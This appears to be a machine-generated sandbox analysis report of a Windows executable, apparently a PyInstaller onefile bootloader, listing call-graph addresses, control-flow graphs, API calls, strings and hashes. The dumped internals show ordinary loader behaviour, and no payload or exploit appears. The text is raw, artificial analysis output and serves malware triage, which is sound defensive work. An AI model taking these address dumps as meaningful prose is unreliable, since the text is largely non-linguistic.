7ff7ff581100 17937->17939 17938->17941 17942 7ff7ff582910 54 API calls 17939->17942 17940 7ff7ff5900bc 74 API calls 17943 7ff7ff5811b4 17940->17943 17941->17940 17942->17941 17943->17932 17955 7ff7ff5846e0 17943->17955 17944 7ff7ff59040c _fread_nolock 53 API calls 17944->17945 17945->17941 17945->17944 17947 7ff7ff5811ed 17945->17947 17948 7ff7ff594f78 _set_fmode 11 API calls 17947->17948 17949 7ff7ff5811f2 17948->17949 17950 7ff7ff582910 54 API calls 17949->17950 17950->17941 17952 7ff7ff590b7c 17951->17952 17969 7ff7ff59089c 17952->17969 17954 7ff7ff590b9a 17954->17842 17956 7ff7ff5846f0 17955->17956 17957 7ff7ff589400 2 API calls 17956->17957 17958 7ff7ff58471b 17957->17958 17959 7ff7ff589400 2 API calls 17958->17959 17968 7ff7ff58478e 17958->17968 17961 7ff7ff584736 17959->17961 17960 7ff7ff58c5c0 _log10_special 8 API calls 17962 7ff7ff5847a9 17960->17962 17963 7ff7ff58473b CreateSymbolicLinkW 17961->17963 17961->17968 17962->17932 17964 7ff7ff584765 17963->17964 17963->17968 17965 7ff7ff58476e GetLastError 17964->17965 17964->17968 17966 7ff7ff584779 17965->17966 17965->17968 17967 7ff7ff5846e0 10 API calls 17966->17967 17967->17968 17968->17960 17970 7ff7ff5908bc 17969->17970 17971 7ff7ff5908e9 17969->17971 17970->17971 17972 7ff7ff5908f1 17970->17972 17973 7ff7ff5908c6 17970->17973 17971->17954 17976 7ff7ff5907dc 17972->17976 17974 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 17973->17974 17974->17971 17983 7ff7ff5954dc EnterCriticalSection 17976->17983 17985 7ff7ff5950a1 17984->17985 17988 7ff7ff5950ce 17984->17988 17986 7ff7ff594f78 _set_fmode 11 API calls 17985->17986 17991 7ff7ff595058 17985->17991 17990 7ff7ff5950ab 17986->17990 17987 7ff7ff5950f1 17992 7ff7ff594f78 _set_fmode 11 API calls 17987->17992 17988->17987 17989 7ff7ff59510d 17988->17989 17993 7ff7ff594fbc 45 API calls 17989->17993 17994 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17990->17994 17991->17850 17995 7ff7ff5950f6 17992->17995 17998 7ff7ff595101 17993->17998 17997 
7ff7ff5950b6 17994->17997 17996 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 17995->17996 17996->17998 17997->17850 17998->17850 18000 7ff7ff584126 17999->18000 18001 7ff7ff5949f4 49 API calls 18000->18001 18003 7ff7ff58414c 18001->18003 18002 7ff7ff58415d 18002->17861 18003->18002 18004 7ff7ff584550 10 API calls 18003->18004 18005 7ff7ff58416f 18004->18005 18005->17861 18007 7ff7ff587cf5 18006->18007 18008 7ff7ff5845b0 108 API calls 18007->18008 18009 7ff7ff587d1b 18008->18009 18010 7ff7ff5845b0 108 API calls 18009->18010 18024 7ff7ff587d42 18009->18024 18011 7ff7ff587d32 18010->18011 18013 7ff7ff587d3d 18011->18013 18014 7ff7ff587d4c 18011->18014 18012 7ff7ff58c5c0 _log10_special 8 API calls 18015 7ff7ff584267 18012->18015 18016 7ff7ff5900bc 74 API calls 18013->18016 18036 7ff7ff590154 18014->18036 18015->17868 18015->17871 18016->18024 18018 7ff7ff587daf 18019 7ff7ff5900bc 74 API calls 18018->18019 18020 7ff7ff587dd7 18019->18020 18022 7ff7ff5900bc 74 API calls 18020->18022 18021 7ff7ff59040c _fread_nolock 53 API calls 18030 7ff7ff587d51 18021->18030 18022->18024 18023 7ff7ff587db6 18026 7ff7ff590180 37 API calls 18023->18026 18024->18012 18025 7ff7ff590b4c 76 API calls 18025->18030 18027 7ff7ff587db1 18026->18027 18027->18018 18042 7ff7ff597388 18027->18042 18028 7ff7ff590180 37 API calls 18028->18030 18030->18018 18030->18021 18030->18023 18030->18025 18030->18027 18030->18028 18031 7ff7ff590154 37 API calls 18030->18031 18031->18030 18034 7ff7ff5818d5 18032->18034 18035 7ff7ff581865 18032->18035 18033 7ff7ff595094 45 API calls 18033->18035 18034->17889 18034->17890 18035->18033 18035->18034 18037 7ff7ff59016d 18036->18037 18038 7ff7ff59015d 18036->18038 18037->18030 18039 7ff7ff594f78 _set_fmode 11 API calls 18038->18039 18040 7ff7ff590162 18039->18040 18041 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18040->18041 18041->18037 18043 7ff7ff597390 18042->18043 18044 7ff7ff5973ac 18043->18044 18045 7ff7ff5973cd 18043->18045 18046 7ff7ff594f78 
_set_fmode 11 API calls 18044->18046 18061 7ff7ff5954dc EnterCriticalSection 18045->18061 18063 7ff7ff595f38 18062->18063 18064 7ff7ff595f5e 18063->18064 18066 7ff7ff595f91 18063->18066 18065 7ff7ff594f78 _set_fmode 11 API calls 18064->18065 18067 7ff7ff595f63 18065->18067 18068 7ff7ff595fa4 18066->18068 18069 7ff7ff595f97 18066->18069 18070 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18067->18070 18081 7ff7ff59ac98 18068->18081 18071 7ff7ff594f78 _set_fmode 11 API calls 18069->18071 18080 7ff7ff584606 18070->18080 18071->18080 18080->16802 18094 7ff7ff5a0348 EnterCriticalSection 18081->18094 18455 7ff7ff597968 18454->18455 18458 7ff7ff597444 18455->18458 18457 7ff7ff597981 18457->16812 18459 7ff7ff59745f 18458->18459 18460 7ff7ff59748e 18458->18460 18462 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 18459->18462 18468 7ff7ff5954dc EnterCriticalSection 18460->18468 18463 7ff7ff59747f 18462->18463 18463->18457 18470 7ff7ff58fee1 18469->18470 18471 7ff7ff58feb3 18469->18471 18478 7ff7ff58fed3 18470->18478 18479 7ff7ff5954dc EnterCriticalSection 18470->18479 18472 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 18471->18472 18472->18478 18478->16816 18481 7ff7ff5845b0 108 API calls 18480->18481 18482 7ff7ff581493 18481->18482 18483 7ff7ff5814bc 18482->18483 18484 7ff7ff58149b 18482->18484 18486 7ff7ff590744 73 API calls 18483->18486 18485 7ff7ff582710 54 API calls 18484->18485 18488 7ff7ff5814ab 18485->18488 18487 7ff7ff5814d1 18486->18487 18489 7ff7ff5814f8 18487->18489 18490 7ff7ff5814d5 18487->18490 18488->16849 18494 7ff7ff581508 18489->18494 18495 7ff7ff581532 18489->18495 18491 7ff7ff594f78 _set_fmode 11 API calls 18490->18491 18492 7ff7ff5814da 18491->18492 18493 7ff7ff582910 54 API calls 18492->18493 18500 7ff7ff5814f3 __std_exception_destroy 18493->18500 18496 7ff7ff594f78 _set_fmode 11 API calls 18494->18496 18497 7ff7ff581538 18495->18497 18505 7ff7ff58154b 18495->18505 18499 7ff7ff581510 18496->18499 18498 7ff7ff581210 92 API calls 
18497->18498 18498->18500 18501 7ff7ff582910 54 API calls 18499->18501 18502 7ff7ff5900bc 74 API calls 18500->18502 18501->18500 18503 7ff7ff5815c4 18502->18503 18503->16849 18504 7ff7ff59040c _fread_nolock 53 API calls 18504->18505 18505->18500 18505->18504 18506 7ff7ff5815d6 18505->18506 18507 7ff7ff594f78 _set_fmode 11 API calls 18506->18507 18508 7ff7ff5815db 18507->18508 18509 7ff7ff582910 54 API calls 18508->18509 18509->18500 18511 7ff7ff589400 2 API calls 18510->18511 18512 7ff7ff589084 LoadLibraryExW 18511->18512 18513 7ff7ff5890a3 __std_exception_destroy 18512->18513 18513->16883 18515 7ff7ff58770b GetProcAddress 18514->18515 18516 7ff7ff5876d9 GetLastError 18514->18516 18587 7ff7ff586365 18586->18587 18588 7ff7ff581c80 49 API calls 18587->18588 18589 7ff7ff5863a1 18588->18589 18590 7ff7ff5863cd 18589->18590 18591 7ff7ff5863aa 18589->18591 18593 7ff7ff584620 49 API calls 18590->18593 18592 7ff7ff582710 54 API calls 18591->18592 18609 7ff7ff5863c3 18592->18609 18594 7ff7ff5863e5 18593->18594 18595 7ff7ff586403 18594->18595 18598 7ff7ff582710 54 API calls 18594->18598 18596 7ff7ff584550 10 API calls 18595->18596 18601 7ff7ff58640d 18596->18601 18597 7ff7ff58c5c0 _log10_special 8 API calls 18599 7ff7ff58336e 18597->18599 18598->18595 18599->16923 18617 7ff7ff5864f0 18599->18617 18600 7ff7ff58641b 18603 7ff7ff584620 49 API calls 18600->18603 18601->18600 18602 7ff7ff589070 3 API calls 18601->18602 18602->18600 18604 7ff7ff586434 18603->18604 18605 7ff7ff586459 18604->18605 18606 7ff7ff586439 18604->18606 18608 7ff7ff589070 3 API calls 18605->18608 18607 7ff7ff582710 54 API calls 18606->18607 18607->18609 18610 7ff7ff586466 18608->18610 18609->18597 18611 7ff7ff586472 18610->18611 18612 7ff7ff5864b1 18610->18612 18614 7ff7ff589400 2 API calls 18611->18614 18676 7ff7ff585820 GetProcAddress 18612->18676 18615 7ff7ff58648a GetLastError 18614->18615 18616 7ff7ff582c50 51 API calls 18615->18616 18616->18609 18766 7ff7ff5853f0 18617->18766 18619 7ff7ff586516 18620 
7ff7ff58651e 18619->18620 18621 7ff7ff58652f 18619->18621 18622 7ff7ff582710 54 API calls 18620->18622 18773 7ff7ff584c80 18621->18773 18628 7ff7ff58652a 18622->18628 18625 7ff7ff58654c 18629 7ff7ff58655c 18625->18629 18631 7ff7ff58656d 18625->18631 18626 7ff7ff58653b 18627 7ff7ff582710 54 API calls 18626->18627 18627->18628 18628->16919 18630 7ff7ff582710 54 API calls 18629->18630 18630->18628 18632 7ff7ff58658c 18631->18632 18634 7ff7ff58659d 18631->18634 18633 7ff7ff582710 54 API calls 18632->18633 18633->18628 18635 7ff7ff5865bd 18634->18635 18636 7ff7ff5865ac 18634->18636 18777 7ff7ff584d40 18635->18777 18637 7ff7ff582710 54 API calls 18636->18637 18637->18628 18655 7ff7ff586060 18654->18655 18655->18655 18656 7ff7ff586089 18655->18656 18662 7ff7ff5860a0 __std_exception_destroy 18655->18662 18657 7ff7ff582710 54 API calls 18656->18657 18658 7ff7ff586095 18657->18658 18658->16921 18659 7ff7ff5861ab 18659->16921 18660 7ff7ff581470 116 API calls 18660->18662 18661 7ff7ff582710 54 API calls 18661->18662 18662->18659 18662->18660 18662->18661 18664 7ff7ff586225 18663->18664 18667 7ff7ff5861fc 18663->18667 18665 7ff7ff582710 54 API calls 18664->18665 18667->18664 18677 7ff7ff585842 GetLastError 18676->18677 18678 7ff7ff58586f GetProcAddress 18676->18678 18681 7ff7ff58584f 18677->18681 18679 7ff7ff58588b GetLastError 18678->18679 18680 7ff7ff58589a GetProcAddress 18678->18680 18679->18681 18682 7ff7ff5858b6 GetLastError 18680->18682 18683 7ff7ff5858c5 GetProcAddress 18680->18683 18684 7ff7ff582c50 51 API calls 18681->18684 18682->18681 18686 7ff7ff5858f3 GetProcAddress 18683->18686 18687 7ff7ff5858e1 GetLastError 18683->18687 18685 7ff7ff585864 18684->18685 18685->18609 18688 7ff7ff585921 GetProcAddress 18686->18688 18689 7ff7ff58590f GetLastError 18686->18689 18687->18681 18690 7ff7ff58593d GetLastError 18688->18690 18691 7ff7ff58594f GetProcAddress 18688->18691 18689->18681 18690->18681 18692 7ff7ff58597d GetProcAddress 18691->18692 18693 7ff7ff58596b GetLastError 
18691->18693 18694 7ff7ff5859ab GetProcAddress 18692->18694 18695 7ff7ff585999 GetLastError 18692->18695 18693->18692 18695->18694 18768 7ff7ff58541c 18766->18768 18767 7ff7ff585424 18767->18619 18768->18767 18771 7ff7ff5855c4 18768->18771 18797 7ff7ff596b14 18768->18797 18769 7ff7ff585787 __std_exception_destroy 18769->18619 18770 7ff7ff5847c0 47 API calls 18770->18771 18771->18769 18771->18770 18774 7ff7ff584cb0 18773->18774 18775 7ff7ff58c5c0 _log10_special 8 API calls 18774->18775 18776 7ff7ff584d1a 18775->18776 18776->18625 18776->18626 18778 7ff7ff584d55 18777->18778 18798 7ff7ff596b44 18797->18798 18801 7ff7ff596010 18798->18801 18800 7ff7ff596b74 18800->18768 18802 7ff7ff596041 18801->18802 18803 7ff7ff596053 18801->18803 18805 7ff7ff594f78 _set_fmode 11 API calls 18802->18805 18804 7ff7ff59609d 18803->18804 18806 7ff7ff596060 18803->18806 18807 7ff7ff5960b8 18804->18807 18810 7ff7ff594830 45 API calls 18804->18810 18808 7ff7ff596046 18805->18808 18809 7ff7ff59a884 _invalid_parameter_noinfo 37 API calls 18806->18809 18815 7ff7ff5960da 18807->18815 18822 7ff7ff596a9c 18807->18822 18812 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18808->18812 18814 7ff7ff596051 18809->18814 18810->18807 18812->18814 18813 7ff7ff59617b 18813->18814 18816 7ff7ff594f78 _set_fmode 11 API calls 18813->18816 18814->18800 18815->18813 18817 7ff7ff594f78 _set_fmode 11 API calls 18815->18817 18818 7ff7ff596226 18816->18818 18819 7ff7ff596170 18817->18819 18820 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18818->18820 18821 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 18819->18821 18820->18814 18821->18813 18823 7ff7ff596abf 18822->18823 18824 7ff7ff596ad6 18822->18824 18828 7ff7ff59ffd8 18823->18828 18826 7ff7ff596ac4 18824->18826 18833 7ff7ff5a0008 18824->18833 18826->18807 18829 7ff7ff59b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18828->18829 18830 7ff7ff59ffe1 18829->18830 18831 7ff7ff59d9f4 45 API calls 18830->18831 18832 7ff7ff59fffa 
18831->18832 18832->18826 18834 7ff7ff594fbc 45 API calls 18833->18834 18835 7ff7ff5a0041 18834->18835 18839 7ff7ff5a004d 18835->18839 18840 7ff7ff5a2eb0 18835->18840 18837 7ff7ff58c5c0 _log10_special 8 API calls 18839->18837 18841 7ff7ff594fbc 45 API calls 18840->18841 18874->16927

Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 0 7ff7ff588bd0-7ff7ff588d16 call 7ff7ff58c8c0 call 7ff7ff589400 SetConsoleCtrlHandler GetStartupInfoW call 7ff7ff595460 call 7ff7ff59a4ec call 7ff7ff59878c call 7ff7ff595460 call 7ff7ff59a4ec call 7ff7ff59878c call 7ff7ff595460 call 7ff7ff59a4ec call 7ff7ff59878c GetCommandLineW CreateProcessW 23 7ff7ff588d18-7ff7ff588d38 GetLastError call 7ff7ff582c50 0->23 24 7ff7ff588d3d-7ff7ff588d79 RegisterClassW 0->24 31 7ff7ff589029-7ff7ff58904f call 7ff7ff58c5c0 23->31 26 7ff7ff588d81-7ff7ff588dd5 CreateWindowExW 24->26 27 7ff7ff588d7b GetLastError 24->27 29 7ff7ff588ddf-7ff7ff588de4 ShowWindow 26->29 30 7ff7ff588dd7-7ff7ff588ddd GetLastError 26->30 27->26 32 7ff7ff588dea-7ff7ff588dfa WaitForSingleObject 29->32 30->32 34 7ff7ff588e78-7ff7ff588e7f 32->34 35 7ff7ff588dfc 32->35 36 7ff7ff588e81-7ff7ff588e91 WaitForSingleObject 34->36 37 7ff7ff588ec2-7ff7ff588ec9 34->37 39 7ff7ff588e00-7ff7ff588e03 35->39 40 7ff7ff588e97-7ff7ff588ea7 TerminateProcess 36->40 41 7ff7ff588fe8-7ff7ff588ff2 36->41 42 7ff7ff588ecf-7ff7ff588ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->42 43 7ff7ff588fb0-7ff7ff588fc9 GetMessageW 37->43 44 7ff7ff588e05 GetLastError 39->44 45 7ff7ff588e0b-7ff7ff588e12 39->45 48 7ff7ff588eaf-7ff7ff588ebd WaitForSingleObject 40->48 49 7ff7ff588ea9 GetLastError 40->49 46 7ff7ff589001-7ff7ff589025 GetExitCodeProcess CloseHandle * 2 41->46 47 7ff7ff588ff4-7ff7ff588ffa DestroyWindow 41->47 50 7ff7ff588ef0-7ff7ff588f28 MsgWaitForMultipleObjects PeekMessageW 42->50 52 7ff7ff588fdf-7ff7ff588fe6 43->52 53 7ff7ff588fcb-7ff7ff588fd9 TranslateMessage DispatchMessageW 43->53 44->45 45->36 51 7ff7ff588e14-7ff7ff588e31 PeekMessageW 45->51 46->31 47->46 48->41 49->48 54 7ff7ff588f63-7ff7ff588f6a 50->54 55 7ff7ff588f2a 50->55 56 7ff7ff588e33-7ff7ff588e64 
TranslateMessage DispatchMessageW PeekMessageW 51->56 57 7ff7ff588e66-7ff7ff588e76 WaitForSingleObject 51->57 52->41 52->43 53->52 54->43 59 7ff7ff588f6c-7ff7ff588f95 QueryPerformanceCounter 54->59 58 7ff7ff588f30-7ff7ff588f61 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->34 57->39 58->54 58->58 59->50 60 7ff7ff588f9b-7ff7ff588fa2 59->60 60->41 61 7ff7ff588fa4-7ff7ff588fa8 60->61 61->43
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction ID: bb1e8f7c11fd39835bd5c9ebc188d4382c84938100bf41fe2b99b186b4af867f
• Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction Fuzzy Hash: 98D15D32A09AC296EB10AF74E8542E9B760FB84B58F800335DA7D47AE4DF3CD555C7A0

Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 62 7ff7ff581000-7ff7ff583806 call 7ff7ff58fe88 call 7ff7ff58fe90 call 7ff7ff58c8c0 call 7ff7ff595460 call 7ff7ff5954f4 call 7ff7ff5836b0 76 7ff7ff583808-7ff7ff58380f 62->76 77 7ff7ff583814-7ff7ff583836 call 7ff7ff581950 62->77 78 7ff7ff583c97-7ff7ff583cb2 call 7ff7ff58c5c0 76->78 83 7ff7ff58383c-7ff7ff583856 call 7ff7ff581c80 77->83 84 7ff7ff58391b-7ff7ff583931 call 7ff7ff5845b0 77->84 88 7ff7ff58385b-7ff7ff58389b call 7ff7ff588a20 83->88 89 7ff7ff58396a-7ff7ff58397f call 7ff7ff582710 84->89 90 7ff7ff583933-7ff7ff583960 call 7ff7ff587f80 84->90 97 7ff7ff58389d-7ff7ff5838a3 88->97 98 7ff7ff5838c1-7ff7ff5838cc call 7ff7ff594fa0 88->98 102 7ff7ff583c8f 89->102 100 7ff7ff583984-7ff7ff5839a6 call 7ff7ff581c80 90->100 101 7ff7ff583962-7ff7ff583965 call 7ff7ff5900bc 90->101 103 7ff7ff5838a5-7ff7ff5838ad 97->103 104 7ff7ff5838af-7ff7ff5838bd call 7ff7ff588b90 97->104 110 7ff7ff5839fc-7ff7ff583a2a call 7ff7ff588b30 call 7ff7ff588b90 * 3 98->110 111 7ff7ff5838d2-7ff7ff5838e1 call 7ff7ff588a20 98->111 115 7ff7ff5839b0-7ff7ff5839b9 100->115 101->89 102->78 103->104 104->98 138 7ff7ff583a2f-7ff7ff583a3e call 7ff7ff588a20 110->138 120 7ff7ff5838e7-7ff7ff5838ed 111->120 121 7ff7ff5839f4-7ff7ff5839f7 call 7ff7ff594fa0 111->121 115->115 118 7ff7ff5839bb-7ff7ff5839d8 call 7ff7ff581950 115->118 118->88 127 7ff7ff5839de-7ff7ff5839ef call 7ff7ff582710 118->127 125 7ff7ff5838f0-7ff7ff5838fc 120->125 121->110 128 7ff7ff5838fe-7ff7ff583903 125->128 129 7ff7ff583905-7ff7ff583908 125->129 127->102 128->125 128->129 129->121 132 7ff7ff58390e-7ff7ff583916 call 7ff7ff594fa0 129->132 132->138 141 7ff7ff583b45-7ff7ff583b53 138->141 142 7ff7ff583a44-7ff7ff583a47 138->142 144 7ff7ff583b59-7ff7ff583b5d 141->144 145 7ff7ff583a67 141->145 142->141 143 7ff7ff583a4d-7ff7ff583a50 142->143 
146 7ff7ff583a56-7ff7ff583a5a 143->146 147 7ff7ff583b14-7ff7ff583b17 143->147 148 7ff7ff583a6b-7ff7ff583a90 call 7ff7ff594fa0 144->148 145->148 146->147 149 7ff7ff583a60 146->149 150 7ff7ff583b19-7ff7ff583b1d 147->150 151 7ff7ff583b2f-7ff7ff583b40 call 7ff7ff582710 147->151 157 7ff7ff583aab-7ff7ff583ac0 148->157 158 7ff7ff583a92-7ff7ff583aa6 call 7ff7ff588b30 148->158 149->145 150->151 153 7ff7ff583b1f-7ff7ff583b2a 150->153 159 7ff7ff583c7f-7ff7ff583c87 151->159 153->148 161 7ff7ff583be8-7ff7ff583bfa call 7ff7ff588a20 157->161 162 7ff7ff583ac6-7ff7ff583aca 157->162 158->157 159->102 171 7ff7ff583c2e 161->171 172 7ff7ff583bfc-7ff7ff583c02 161->172 164 7ff7ff583bcd-7ff7ff583be2 call 7ff7ff581940 162->164 165 7ff7ff583ad0-7ff7ff583ae8 call 7ff7ff5952c0 162->165 164->161 164->162 175 7ff7ff583aea-7ff7ff583b02 call 7ff7ff5952c0 165->175 176 7ff7ff583b62-7ff7ff583b7a call 7ff7ff5952c0 165->176 177 7ff7ff583c31-7ff7ff583c40 call 7ff7ff594fa0 171->177 173 7ff7ff583c1e-7ff7ff583c2c 172->173 174 7ff7ff583c04-7ff7ff583c1c 172->174 173->177 174->177 175->164 186 7ff7ff583b08-7ff7ff583b0f 175->186 184 7ff7ff583b7c-7ff7ff583b80 176->184 185 7ff7ff583b87-7ff7ff583b9f call 7ff7ff5952c0 176->185 187 7ff7ff583c46-7ff7ff583c4a 177->187 188 7ff7ff583d41-7ff7ff583d63 call 7ff7ff5844d0 177->188 184->185 197 7ff7ff583bac-7ff7ff583bc4 call 7ff7ff5952c0 185->197 198 7ff7ff583ba1-7ff7ff583ba5 185->198 186->164 190 7ff7ff583cd4-7ff7ff583ce6 call 7ff7ff588a20 187->190 191 7ff7ff583c50-7ff7ff583c5f call 7ff7ff5890e0 187->191 201 7ff7ff583d65-7ff7ff583d6f call 7ff7ff584620 188->201 202 7ff7ff583d71-7ff7ff583d82 call 7ff7ff581c80 188->202 206 7ff7ff583ce8-7ff7ff583ceb 190->206 207 7ff7ff583d35-7ff7ff583d3c 190->207 204 7ff7ff583cb3-7ff7ff583cb6 call 7ff7ff588850 191->204 205 7ff7ff583c61 191->205 197->164 219 7ff7ff583bc6 197->219 198->197 210 7ff7ff583d87-7ff7ff583d96 201->210 202->210 218 7ff7ff583cbb-7ff7ff583cbd 204->218 213 7ff7ff583c68 call 7ff7ff582710 205->213 206->207 214 
7ff7ff583ced-7ff7ff583d10 call 7ff7ff581c80 206->214 207->213 216 7ff7ff583d98-7ff7ff583d9f 210->216 217 7ff7ff583dc4-7ff7ff583dda call 7ff7ff589400 210->217 226 7ff7ff583c6d-7ff7ff583c77 213->226 230 7ff7ff583d2b-7ff7ff583d33 call 7ff7ff594fa0 214->230 231 7ff7ff583d12-7ff7ff583d26 call 7ff7ff582710 call 7ff7ff594fa0 214->231 216->217 222 7ff7ff583da1-7ff7ff583da5 216->222 234 7ff7ff583ddc 217->234 235 7ff7ff583de8-7ff7ff583e04 SetDllDirectoryW 217->235 224 7ff7ff583cc8-7ff7ff583ccf 218->224 225 7ff7ff583cbf-7ff7ff583cc6 218->225 219->164 222->217 228 7ff7ff583da7-7ff7ff583dbe SetDllDirectoryW LoadLibraryExW 222->228 224->210 225->213 226->159 228->217 230->210 231->226 234->235 238 7ff7ff583e0a-7ff7ff583e19 call 7ff7ff588a20 235->238 239 7ff7ff583f01-7ff7ff583f08 235->239 251 7ff7ff583e1b-7ff7ff583e21 238->251 252 7ff7ff583e32-7ff7ff583e3c call 7ff7ff594fa0 238->252 241 7ff7ff583f0e-7ff7ff583f15 239->241 242 7ff7ff583ffc-7ff7ff584004 239->242 241->242 245 7ff7ff583f1b-7ff7ff583f25 call 7ff7ff5833c0 241->245 246 7ff7ff584029-7ff7ff58405b call 7ff7ff5836a0 call 7ff7ff583360 call 7ff7ff583670 call 7ff7ff586fb0 call 7ff7ff586d60 242->246 247 7ff7ff584006-7ff7ff584023 PostMessageW GetMessageW 242->247 245->226 259 7ff7ff583f2b-7ff7ff583f3f call 7ff7ff5890c0 245->259 247->246 256 7ff7ff583e2d-7ff7ff583e2f 251->256 257 7ff7ff583e23-7ff7ff583e2b 251->257 261 7ff7ff583ef2-7ff7ff583efc call 7ff7ff588b30 252->261 262 7ff7ff583e42-7ff7ff583e48 252->262 256->252 257->256 271 7ff7ff583f64-7ff7ff583fa0 call 7ff7ff588b30 call 7ff7ff588bd0 call 7ff7ff586fb0 call 7ff7ff586d60 call 7ff7ff588ad0 259->271 272 7ff7ff583f41-7ff7ff583f5e PostMessageW GetMessageW 259->272 261->239 262->261 266 7ff7ff583e4e-7ff7ff583e54 262->266 269 7ff7ff583e56-7ff7ff583e58 266->269 270 7ff7ff583e5f-7ff7ff583e61 266->270 274 7ff7ff583e5a 269->274 275 7ff7ff583e67-7ff7ff583e83 call 7ff7ff586db0 call 7ff7ff587330 269->275 270->239 270->275 307 7ff7ff583fa5-7ff7ff583fa7 271->307 272->271 274->239 290 
7ff7ff583e8e-7ff7ff583e95 275->290 291 7ff7ff583e85-7ff7ff583e8c 275->291 294 7ff7ff583e97-7ff7ff583ea4 call 7ff7ff586df0 290->294 295 7ff7ff583eaf-7ff7ff583eb9 call 7ff7ff5871a0 290->295 293 7ff7ff583edb-7ff7ff583ef0 call 7ff7ff582a50 call 7ff7ff586fb0 call 7ff7ff586d60 291->293 293->239 294->295 304 7ff7ff583ea6-7ff7ff583ead 294->304 305 7ff7ff583ebb-7ff7ff583ec2 295->305 306 7ff7ff583ec4-7ff7ff583ed2 call 7ff7ff5874e0 295->306 304->293 305->293 306->239 319 7ff7ff583ed4 306->319 310 7ff7ff583fe9-7ff7ff583ff7 call 7ff7ff581900 307->310 311 7ff7ff583fa9-7ff7ff583fb3 call 7ff7ff589200 307->311 310->226 311->310 321 7ff7ff583fb5-7ff7ff583fca 311->321 319->293 322 7ff7ff583fcc-7ff7ff583fdf call 7ff7ff582710 call 7ff7ff581900 321->322 323 7ff7ff583fe4 call 7ff7ff582a50 321->323 322->226 323->310
Strings
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417
• Opcode ID: f4bde723f435afbc19067a7a24fd6b211f61cdc128d128b32e21301cfb995a7e
• Instruction ID: 57a01c2ceafa3121435a7f2d813a76db16d70b1190a458cf91c2cf10d2ca6edc
• Opcode Fuzzy Hash: f4bde723f435afbc19067a7a24fd6b211f61cdc128d128b32e21301cfb995a7e
• Instruction Fuzzy Hash: 90328D21A0D6C291FB29BB25D4542F9E691BF45780FC84232DA7E432D6EF2CE565C3E0

Control-flow Graph

